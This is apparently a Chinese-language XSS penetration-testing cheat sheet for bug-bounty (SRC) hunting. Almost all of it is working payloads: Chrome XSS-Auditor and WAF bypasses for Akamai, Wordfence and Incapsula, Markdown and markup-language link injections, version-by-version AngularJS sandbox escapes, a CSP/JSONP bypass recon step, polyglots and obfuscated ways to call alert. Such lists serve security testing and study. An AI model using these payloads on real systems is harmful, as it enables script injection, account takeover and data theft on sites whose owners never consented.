XSS渗透笔记
javascript禁用后用于提升漏洞危害,适用于SRC挖掘
"><style>body{display:none}</style>
Chrome XSS-Auditor 绕过 by @vivekchsm
<svg><animate xlink:href=#x attributeName=href values=javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
Chrome < v60 beta XSS-Auditor 绕过
<script src="data:,alert(1)%250A-->
Other Chrome XSS-Auditor 绕过
<script>alert(1)</script
<script>alert(1)%0d%0a-->%09</script
``````html
<x>%00%00%00%00%00%00%00<script>alert(1)</script>
Safari XSS 向量 by @mramydnei
<script>location.href;'javascript:alert%281%29'</script>
XSS 变种 by Ahmed Elsobky
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Kona WAF (Akamai) 绕过
\');confirm(1);//
<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>
Wordfence XSS 绕过
<meter onmouseover="alert(1)"
'">><div><meter onmouseover="alert(1)"</div>"
>><marquee loop=1 width=0 onfinish=alert(1)>
Incapsula WAF 绕过 by @i_bo0om
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
jQuery < 3.0.0 XSS by Egor Homakov
$.get('http://sakurity.com/jqueryxss')
为了真正利用这个jQuery XSS,你需要满足以下要求之一:
1)发现任何跨域请求到不受信任的域,可能会无意中执行脚本。 2)找到任何可以将脚本注入数据源的可信API端点的请求。
URL 验证绕过 (没有 也行)
javas	cript://www.google.com/%0Aalert(1)
Markdown XSS
[a](javascript:confirm(1))
[a](javascript://www.google.com%0Aprompt(1))
[a](javascript://%0d%0aconfirm(1))
[a](javascript://%0d%0aconfirm(1);com)
[a](javascript:window.onerror=confirm;throw%201)
[a]: (javascript:prompt(1))
[a]:(javascript:alert(1)) //Add SOH Character
Flash SWF XSS
_Note:关于构建基于flash的XSS有效负载的有用参考资料[MWR Labs](https://labs.mwrinfosecurity.com/blog/poppingalert1 -in-flash/)._Lightweight Markup Languages
RubyDoc (.rdoc)
XSS[JavaScript:alert(1)]
Textile (.textile)
"Test link":javascript:alert(1)
reStructuredText (.rst)
`Test link`__.
__ javascript:alert(document.domain)
Unicode 编码
†‡•<img src=a onerror=javascript:alert('test')>…‰€
AngularJS 模板注入 XSS
要对活动目标进行手动验证,请使用“angular”。版本'在您的浏览器控制台1.0.1 - 1.1.5 by Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1 by Jan Horn (Google)
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5 by Gareth Heyes (PortSwigger)
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
1.2.6 - 1.2.18 by Jan Horn (Google)
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23 by Mathias Karlsson
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29 by Gareth Heyes (PortSwigger)
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
1.3.0 by Gábor Molnár (Google)
{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}
1.3.1 - 1.3.2 by Gareth Heyes (PortSwigger)
{{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//');
}}
1.3.3 - 1.3.18 by Gareth Heyes (PortSwigger)
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}
1.3.19 by Gareth Heyes (PortSwigger)
{{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//');
}}
1.3.20 by Gareth Heyes (PortSwigger)
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9 by Gareth Heyes (PortSwigger)
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8 by Ian Hickey
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11 by Jan Horn (Google)
{{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
B=C(b,c,b);$evalAsync("
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'};
");
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}
1.6.0+ (no Expression Sandbox) by Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
Content Security Policy (CSP) 绕过 ,通过 JSONP
获取目标 CSP:
curl -I http://example.com | grep 'Content-Security-Policy'
现在,我们可以使用谷歌dork在上面列出的域中找到一些JSONP端点。
site:example.com inurl:callback
多语种XSS测试
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
调用函数的 JS 模板字面量
<svg onload=alert`1`></svg>
<script>alert`1`</script>
避免关键字和特定子字符串,如已经在JS代码里
(alert)(1)
globalThis[`al`+/ert/.source]`1`
this[`al`+/ert/.source]`1`
[alert][0].call(this,1)
window['a'+'l'+'e'+'r'+'t']()
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
(1,2,3,4,5,6,7,8,alert)(1)
x=alert,x(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
al\u0065rt`1`
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
改变大小写
有时,正则表达式或其他定制过滤器会进行区分大小写的匹配。然后,您可以只使用 toLowerCase(),例如:
globalThis["aLeRt".toLowerCase()]
双重编码
有时应用程序会在再次解码之前对字符串执行 XSS 过滤,这会使过滤器绕过打开它。这非常罕见,
字符 双编码
< %253C
> %253E
( %2528
) %2529
" %2522
' %2527
如果想学好XSS慢慢研究学习相关的模板语言。